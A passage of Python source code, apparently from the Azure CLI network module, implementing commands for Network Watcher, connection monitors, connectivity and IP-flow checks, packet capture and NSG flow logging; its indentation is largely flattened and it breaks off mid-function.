instance.priority = priority if priority is not None else instance.priority
return instance
# endregion
# region NetworkProfiles
def list_network_profiles(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).network_profiles
if resource_group_name:
return client.list(resource_group_name)
return client.list_all()
# endregion
# region NetworkWatchers
def _create_network_watchers(cmd, client, resource_group_name, locations, tags):
if resource_group_name is None:
raise CLIError("usage error: '--resource-group' required when enabling new regions")
NetworkWatcher = cmd.get_models('NetworkWatcher')
for location in locations:
client.create_or_update(
resource_group_name, '{}-watcher'.format(location),
NetworkWatcher(location=location, tags=tags))
def _update_network_watchers(cmd, client, watchers, tags):
NetworkWatcher = cmd.get_models('NetworkWatcher')
for watcher in watchers:
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
watcher_tags = watcher.tags if tags is None else tags
client.create_or_update(
watcher_rg, watcher_name,
NetworkWatcher(location=watcher.location, tags=watcher_tags))
def _delete_network_watchers(cmd, client, watchers):
for watcher in watchers:
from azure.cli.core.commands import LongRunningOperation
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
logger.warning(
"Disabling Network Watcher for region '%s' by deleting resource '%s'",
watcher.location, watcher.id)
LongRunningOperation(cmd.cli_ctx)(client.begin_delete(watcher_rg, watcher_name))
def configure_network_watcher(cmd, client, locations, resource_group_name=None, enabled=None, tags=None):
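    """Enable, disable, or re-tag Network Watcher across regions.

    With enabled=None, existing watchers are updated in place; with
    enabled=True, regions without a watcher get a new '<location>-watcher'
    resource in the given resource group; with enabled=False, the matching
    watchers are deleted (in which case tags are rejected).
    """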
watcher_list = list(client.list_all())
locations_list = [location.lower() for location in locations]
existing_watchers = [w for w in watcher_list if w.location in locations_list]
nonenabled_regions = list(set(locations) - set(watcher.location for watcher in existing_watchers))
if enabled is None:
if resource_group_name is not None:
logger.warning(
"Resource group '%s' is only used when enabling new regions and will be ignored.",
resource_group_name)
for location in nonenabled_regions:
logger.warning(
"Region '%s' is not enabled for Network Watcher and will be ignored.", location)
_update_network_watchers(cmd, client, existing_watchers, tags)
elif enabled:
_create_network_watchers(cmd, client, resource_group_name, nonenabled_regions, tags)
_update_network_watchers(cmd, client, existing_watchers, tags)
else:
if tags is not None:
raise CLIError("usage error: '--tags' cannot be used when disabling regions")
_delete_network_watchers(cmd, client, existing_watchers)
return client.list_all()
def create_nw_connection_monitor(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
resource_group_name=None,
location=None,
source_resource=None,
source_port=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=None,
output_type=None,
workspace_ids=None,
notes=None):
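    """Create a connection monitor, dispatching between the V1 and V2 shapes.

    Supplying any of the source/destination resource parameters selects the V1
    payload (and an ad-hoc API version for the client); supplying endpoint,
    test-configuration, or output parameters selects the V2 payload. Providing
    neither set raises an error.
    """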
v1_required_parameter_set = [
source_resource, source_port,
dest_resource, dest_address, dest_port
]
v2_required_parameter_set = [
endpoint_source_name, endpoint_source_resource_id, endpoint_source_type, endpoint_source_coverage_level,
endpoint_dest_name, endpoint_dest_address, endpoint_dest_type, endpoint_dest_coverage_level,
test_config_name, test_config_protocol,
output_type, workspace_ids,
]
if any(v1_required_parameter_set): # V1 creation
connection_monitor = _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name,
source_port,
location,
dest_resource,
dest_port,
dest_address,
tags,
do_not_start,
monitoring_interval)
from azure.cli.core.profiles._shared import AD_HOC_API_VERSIONS
client = get_mgmt_service_client(
cmd.cli_ctx,
ResourceType.MGMT_NETWORK,
api_version=AD_HOC_API_VERSIONS[ResourceType.MGMT_NETWORK]['nw_connection_monitor']
).connection_monitors
elif any(v2_required_parameter_set): # V2 creation
connection_monitor = _create_nw_connection_monitor_v2(cmd,
location,
tags,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address,
endpoint_source_type,
endpoint_source_coverage_level,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address,
endpoint_dest_type,
endpoint_dest_coverage_level,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_preferred_ip_version,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https,
test_group_name,
test_group_disable,
output_type,
workspace_ids,
notes)
else:
        raise CLIError('unknown operation: provide either the V1 source/destination parameters or the V2 endpoint/test-configuration parameters')
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name=None,
source_port=None,
location=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=60):
ConnectionMonitor, ConnectionMonitorSource, ConnectionMonitorDestination = cmd.get_models(
'ConnectionMonitor', 'ConnectionMonitorSource', 'ConnectionMonitorDestination')
cmv1 = ConnectionMonitor(
location=location,
tags=tags,
source=ConnectionMonitorSource(
resource_id=source_resource,
port=source_port
),
destination=ConnectionMonitorDestination(
resource_id=dest_resource,
port=dest_port,
address=dest_address
),
auto_start=not do_not_start,
monitoring_interval_in_seconds=monitoring_interval,
endpoints=None,
test_configurations=None,
test_groups=None,
outputs=None,
notes=None
)
return cmv1
def _create_nw_connection_monitor_v2(cmd,
location=None,
tags=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_tcp_disable_trace_route=False,
test_config_icmp_disable_trace_route=False,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=False,
output_type=None,
workspace_ids=None,
notes=None):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_resource_id=endpoint_source_resource_id,
address=endpoint_source_address,
endpoint_type=endpoint_source_type,
coverage_level=endpoint_source_coverage_level)
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_resource_id=endpoint_dest_resource_id,
address=endpoint_dest_address,
endpoint_type=endpoint_dest_type,
coverage_level=endpoint_dest_coverage_level)
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
test_group = _create_nw_connection_monitor_v2_test_group(cmd,
test_group_name,
test_group_disable,
[test_config],
[src_endpoint],
[dst_endpoint])
if output_type:
outputs = []
if workspace_ids:
for workspace_id in workspace_ids:
output = _create_nw_connection_monitor_v2_output(cmd, output_type, workspace_id)
outputs.append(output)
else:
outputs = []
ConnectionMonitor = cmd.get_models('ConnectionMonitor')
cmv2 = ConnectionMonitor(location=location,
tags=tags,
auto_start=None,
monitoring_interval_in_seconds=None,
endpoints=[src_endpoint, dst_endpoint],
test_configurations=[test_config],
test_groups=[test_group],
outputs=outputs,
notes=notes)
return cmv2
def _create_nw_connection_monitor_v2_endpoint(cmd,
name,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
endpoint_type=None,
coverage_level=None):
if (filter_type and not filter_items) or (not filter_type and filter_items):
raise CLIError('usage error: '
'--filter-type and --filter-item for endpoint filter must be present at the same time.')
ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter')
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
return endpoint
def _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
test_frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
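    """Build a ConnectionMonitorTestConfiguration for a V2 connection monitor.

    A success threshold is attached when either threshold argument is given,
    and exactly one protocol-specific block (TCP, ICMP, or HTTP) is populated
    based on the protocol; any other protocol raises a CLIError.
    """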
(ConnectionMonitorTestConfigurationProtocol,
ConnectionMonitorTestConfiguration, ConnectionMonitorSuccessThreshold) = cmd.get_models(
'ConnectionMonitorTestConfigurationProtocol',
'ConnectionMonitorTestConfiguration', 'ConnectionMonitorSuccessThreshold')
test_config = ConnectionMonitorTestConfiguration(name=name,
test_frequency_sec=test_frequency,
protocol=protocol,
preferred_ip_version=preferred_ip_version)
if threshold_failed_percent or threshold_round_trip_time:
threshold = ConnectionMonitorSuccessThreshold(checks_failed_percent=threshold_failed_percent,
round_trip_time_ms=threshold_round_trip_time)
test_config.success_threshold = threshold
if protocol == ConnectionMonitorTestConfigurationProtocol.tcp:
ConnectionMonitorTcpConfiguration = cmd.get_models('ConnectionMonitorTcpConfiguration')
tcp_config = ConnectionMonitorTcpConfiguration(
port=tcp_port,
destination_port_behavior=tcp_port_behavior,
disable_trace_route=tcp_disable_trace_route
)
test_config.tcp_configuration = tcp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.icmp:
ConnectionMonitorIcmpConfiguration = cmd.get_models('ConnectionMonitorIcmpConfiguration')
icmp_config = ConnectionMonitorIcmpConfiguration(disable_trace_route=icmp_disable_trace_route)
test_config.icmp_configuration = icmp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.http:
ConnectionMonitorHttpConfiguration = cmd.get_models('ConnectionMonitorHttpConfiguration')
http_config = ConnectionMonitorHttpConfiguration(
port=http_port,
method=http_method,
path=http_path,
request_headers=http_request_headers,
valid_status_code_ranges=http_valid_status_codes,
prefer_https=http_prefer_https)
test_config.http_configuration = http_config
else:
raise CLIError('Unsupported protocol: "{}" for test configuration'.format(protocol))
return test_config
def _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
test_configurations,
source_endpoints,
destination_endpoints):
ConnectionMonitorTestGroup = cmd.get_models('ConnectionMonitorTestGroup')
test_group = ConnectionMonitorTestGroup(name=name,
disable=disable,
test_configurations=[tc.name for tc in test_configurations],
sources=[e.name for e in source_endpoints],
destinations=[e.name for e in destination_endpoints])
return test_group
def _create_nw_connection_monitor_v2_output(cmd,
output_type,
workspace_id=None):
ConnectionMonitorOutput, OutputType = cmd.get_models('ConnectionMonitorOutput', 'OutputType')
output = ConnectionMonitorOutput(type=output_type)
if output_type == OutputType.workspace:
ConnectionMonitorWorkspaceSettings = cmd.get_models('ConnectionMonitorWorkspaceSettings')
workspace = ConnectionMonitorWorkspaceSettings(workspace_resource_id=workspace_id)
output.workspace_settings = workspace
else:
raise CLIError('Unsupported output type: "{}"'.format(output_type))
return output
def add_nw_connection_monitor_v2_endpoint(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
coverage_level=None,
endpoint_type=None,
source_test_groups=None,
dest_test_groups=None,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
address_include=None,
address_exclude=None):
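    """Add an endpoint to an existing V2 connection monitor.

    Optional include/exclude addresses become an endpoint scope, and
    filter_type/filter_items become an endpoint filter. The endpoint is then
    registered as a source and/or destination in the named test groups before
    the monitor is updated.
    """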
(ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter,
ConnectionMonitorEndpointScope, ConnectionMonitorEndpointScopeItem) = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter',
'ConnectionMonitorEndpointScope', 'ConnectionMonitorEndpointScopeItem')
endpoint_scope = ConnectionMonitorEndpointScope(include=[], exclude=[])
for ip in address_include or []:
include_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.include.append(include_item)
for ip in address_exclude or []:
exclude_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.exclude.append(exclude_item)
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level,
scope=endpoint_scope if address_include or address_exclude else None)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.endpoints.append(endpoint)
src_test_groups, dst_test_groups = set(source_test_groups or []), set(dest_test_groups or [])
for test_group in connection_monitor.test_groups:
if test_group.name in src_test_groups:
test_group.sources.append(endpoint.name)
if test_group.name in dst_test_groups:
test_group.destinations.append(endpoint.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh endpoints
new_endpoints = [endpoint for endpoint in connection_monitor.endpoints if endpoint.name != name]
connection_monitor.endpoints = new_endpoints
# refresh test groups
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
for test_group in temp_test_groups:
if name in test_group.sources:
test_group.sources.remove(name)
if name in test_group.destinations:
test_group.destinations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for endpoint in connection_monitor.endpoints:
if endpoint.name == name:
return endpoint
raise CLIError('unknown endpoint: {}'.format(name))
def list_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.endpoints
def add_nw_connection_monitor_v2_test_configuration(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
protocol,
test_groups,
frequency=None,
threshold_failed_percent=None,
threshold_round_trip_time=None,
preferred_ip_version=None,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
new_test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port,
tcp_port_behavior,
tcp_disable_trace_route,
icmp_disable_trace_route,
http_port,
http_method,
http_path,
http_valid_status_codes,
http_prefer_https,
http_request_headers)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.test_configurations.append(new_test_config)
for test_group in connection_monitor.test_groups:
if test_group.name in test_groups:
test_group.test_configurations.append(new_test_config.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh test configurations
new_test_configurations = [t for t in connection_monitor.test_configurations if t.name != name]
connection_monitor.test_configurations = new_test_configurations
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
# refresh test groups
for test_group in temp_test_groups:
        # guard against test groups that do not reference this configuration
        if name in test_group.test_configurations:
            test_group.test_configurations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for test_config in connection_monitor.test_configurations:
if test_config.name == name:
return test_config
raise CLIError('unknown test configuration: {}'.format(name))
def list_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_configurations
def add_nw_connection_monitor_v2_test_group(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
location,
name,
endpoint_source_name,
endpoint_dest_name,
test_config_name,
disable=False,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None):
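    """Add a test group to an existing V2 connection monitor.

    Source/destination endpoints and a test configuration are created on the
    fly when their parameters are supplied; otherwise the given names are
    assumed to reference items that already exist on the monitor.
    """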
new_test_configuration_creation_requirements = [
test_config_protocol, test_config_preferred_ip_version,
test_config_threshold_failed_percent, test_config_threshold_round_trip_time,
test_config_tcp_disable_trace_route, test_config_tcp_port,
test_config_icmp_disable_trace_route,
test_config_http_port, test_config_http_method,
test_config_http_path, test_config_http_valid_status_codes, test_config_http_prefer_https
]
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_group = _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
[], [], [])
# deal with endpoint
if any([endpoint_source_address, endpoint_source_resource_id]):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address)
connection_monitor.endpoints.append(src_endpoint)
if any([endpoint_dest_address, endpoint_dest_resource_id]):
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address)
connection_monitor.endpoints.append(dst_endpoint)
new_test_group.sources.append(endpoint_source_name)
new_test_group.destinations.append(endpoint_dest_name)
# deal with test configuration
if any(new_test_configuration_creation_requirements):
        # Pass the optional arguments by keyword so that the helper's tcp_port_behavior
        # parameter (not exposed by this command) does not shift the remaining values.
        test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
                                                                           test_config_name,
                                                                           test_config_frequency,
                                                                           test_config_protocol,
                                                                           test_config_threshold_failed_percent,
                                                                           test_config_threshold_round_trip_time,
                                                                           test_config_preferred_ip_version,
                                                                           tcp_port=test_config_tcp_port,
                                                                           tcp_disable_trace_route=test_config_tcp_disable_trace_route,
                                                                           icmp_disable_trace_route=test_config_icmp_disable_trace_route,
                                                                           http_port=test_config_http_port,
                                                                           http_method=test_config_http_method,
                                                                           http_path=test_config_http_path,
                                                                           http_valid_status_codes=test_config_http_valid_status_codes,
                                                                           http_prefer_https=test_config_http_prefer_https)
connection_monitor.test_configurations.append(test_config)
new_test_group.test_configurations.append(test_config_name)
connection_monitor.test_groups.append(new_test_group)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_groups, removed_test_group = [], None
for t in connection_monitor.test_groups:
if t.name == name:
removed_test_group = t
else:
new_test_groups.append(t)
if removed_test_group is None:
        raise CLIError('test group: "{}" does not exist'.format(name))
connection_monitor.test_groups = new_test_groups
# deal with endpoints which are only referenced by this removed test group
removed_endpoints = []
for e in removed_test_group.sources + removed_test_group.destinations:
tmp = [t for t in connection_monitor.test_groups if (e in t.sources or e in t.destinations)]
if not tmp:
removed_endpoints.append(e)
connection_monitor.endpoints = [e for e in connection_monitor.endpoints if e.name not in removed_endpoints]
# deal with test configurations which are only referenced by this removed test group
removed_test_configurations = []
for c in removed_test_group.test_configurations:
tmp = [t for t in connection_monitor.test_groups if c in t.test_configurations]
if not tmp:
removed_test_configurations.append(c)
connection_monitor.test_configurations = [c for c in connection_monitor.test_configurations
if c.name not in removed_test_configurations]
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for t in connection_monitor.test_groups:
if t.name == name:
return t
raise CLIError('unknown test group: {}'.format(name))
def list_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_groups
def add_nw_connection_monitor_v2_output(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
out_type,
workspace_id=None):
output = _create_nw_connection_monitor_v2_output(cmd, out_type, workspace_id)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
if connection_monitor.outputs is None:
connection_monitor.outputs = []
connection_monitor.outputs.append(output)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.outputs = []
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def list_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.outputs
def show_topology_watcher(cmd, client, resource_group_name, network_watcher_name, target_resource_group_name=None,
target_vnet=None, target_subnet=None): # pylint: disable=unused-argument
TopologyParameters = cmd.get_models('TopologyParameters')
return client.get_topology(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
parameters=TopologyParameters(
target_resource_group_name=target_resource_group_name,
target_virtual_network=target_vnet,
target_subnet=target_subnet
))
def check_nw_connectivity(cmd, client, watcher_rg, watcher_name, source_resource, source_port=None,
dest_resource=None, dest_port=None, dest_address=None,
resource_group_name=None, protocol=None, method=None, headers=None, valid_status_codes=None):
ConnectivitySource, ConnectivityDestination, ConnectivityParameters, ProtocolConfiguration, HTTPConfiguration = \
cmd.get_models(
'ConnectivitySource', 'ConnectivityDestination', 'ConnectivityParameters', 'ProtocolConfiguration',
'HTTPConfiguration')
params = ConnectivityParameters(
source=ConnectivitySource(resource_id=source_resource, port=source_port),
destination=ConnectivityDestination(resource_id=dest_resource, address=dest_address, port=dest_port),
protocol=protocol
)
if any([method, headers, valid_status_codes]):
params.protocol_configuration = ProtocolConfiguration(http_configuration=HTTPConfiguration(
method=method,
headers=headers,
valid_status_codes=valid_status_codes
))
return client.begin_check_connectivity(watcher_rg, watcher_name, params)
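# check_nw_ip_flow expects '--local' and '--remote' as 'ip:port' strings and splits them itself.
# Minimal illustrative call (hypothetical values; cmd/client are supplied by the CLI framework):
#   check_nw_ip_flow(cmd, client, vm='myVM', watcher_rg='rg', watcher_name='watcher',
#                    direction='Inbound', protocol='TCP', local='10.0.0.4:22',
#                    remote='203.0.113.5:443', resource_group_name='rg')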
def check_nw_ip_flow(cmd, client, vm, watcher_rg, watcher_name, direction, protocol, local, remote,
resource_group_name=None, nic=None, location=None):
VerificationIPFlowParameters = cmd.get_models('VerificationIPFlowParameters')
try:
local_ip_address, local_port = local.split(':')
remote_ip_address, remote_port = remote.split(':')
except ValueError:
raise CLIError("usage error: the format of '--local' and '--remote' should be like x.x.x.x:port")
if not is_valid_resource_id(vm):
if not resource_group_name:
raise CLIError("usage error: --vm NAME --resource-group NAME | --vm ID")
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
if not resource_group_name:
raise CLIError("usage error: --nic NAME --resource-group NAME | --nic ID")
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_verify_ip_flow(
watcher_rg, watcher_name,
VerificationIPFlowParameters(
target_resource_id=vm, direction=direction, protocol=protocol, local_port=local_port,
remote_port=remote_port, local_ip_address=local_ip_address,
remote_ip_address=remote_ip_address, target_nic_resource_id=nic))
def show_nw_next_hop(cmd, client, resource_group_name, vm, watcher_rg, watcher_name,
source_ip, dest_ip, nic=None, location=None):
NextHopParameters = cmd.get_models('NextHopParameters')
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_get_next_hop(
watcher_rg, watcher_name, NextHopParameters(target_resource_id=vm,
source_ip_address=source_ip,
destination_ip_address=dest_ip,
target_nic_resource_id=nic))
def show_nw_security_view(cmd, client, resource_group_name, vm, watcher_rg, watcher_name, location=None):
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
security_group_view_parameters = cmd.get_models('SecurityGroupViewParameters')(target_resource_id=vm)
return client.begin_get_vm_security_rules(watcher_rg, watcher_name, security_group_view_parameters)
def create_nw_packet_capture(cmd, client, resource_group_name, capture_name, vm,
watcher_rg, watcher_name, location=None,
storage_account=None, storage_path=None, file_path=None,
capture_size=None, capture_limit=None, time_limit=None, filters=None):
PacketCapture, PacketCaptureStorageLocation = cmd.get_models('PacketCapture', 'PacketCaptureStorageLocation')
storage_settings = PacketCaptureStorageLocation(storage_id=storage_account,
storage_path=storage_path, file_path=file_path)
capture_params = PacketCapture(target=vm, storage_location=storage_settings,
bytes_to_capture_per_packet=capture_size,
total_bytes_per_session=capture_limit, time_limit_in_seconds=time_limit,
filters=filters)
return client.begin_create(watcher_rg, watcher_name, capture_name, capture_params)
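# set_nsg_flow_logging follows a read-modify-write pattern: it fetches the current flow-log status
# for the NSG, patches only the supplied fields (storage, retention, format, traffic analytics),
# and then pushes the complete configuration back via begin_set_flow_log_configuration.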
def set_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, nsg, storage_account=None,
resource_group_name=None, enabled=None, retention=0, log_format=None, log_version=None,
traffic_analytics_workspace=None, traffic_analytics_interval=None,
traffic_analytics_enabled=None):
from azure.cli.core.commands import LongRunningOperation
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
config = LongRunningOperation(cmd.cli_ctx)(client.begin_get_flow_log_status(watcher_rg,
watcher_name,
flowlog_status_parameters))
try:
if not config.flow_analytics_configuration.network_watcher_flow_analytics_configuration.workspace_id:
config.flow_analytics_configuration = None
except AttributeError:
config.flow_analytics_configuration = None
with cmd.update_context(config) as c:
c.set_param('enabled', enabled if enabled is not None else config.enabled)
c.set_param('storage_id', storage_account or config.storage_id)
if retention is not None:
config.retention_policy = {
'days': retention,
'enabled': int(retention) > 0
}
if cmd.supported_api_version(min_api='2018-10-01') and (log_format or log_version):
config.format = {
'type': log_format,
'version': log_version
}
if cmd.supported_api_version(min_api='2018-10-01') and \
any([traffic_analytics_workspace is not None, traffic_analytics_enabled is not None]):
workspace = None
if traffic_analytics_workspace:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not config.flow_analytics_configuration:
# must create whole object
if not workspace:
raise CLIError('usage error (analytics not already configured): --workspace NAME_OR_ID '
'[--enabled {true|false}]')
if traffic_analytics_enabled is None:
traffic_analytics_enabled = True
config.flow_analytics_configuration = {
'network_watcher_flow_analytics_configuration': {
'enabled': traffic_analytics_enabled,
'workspace_id': workspace.properties['customerId'],
'workspace_region': workspace.location,
'workspace_resource_id': traffic_analytics_workspace,
'traffic_analytics_interval': traffic_analytics_interval
}
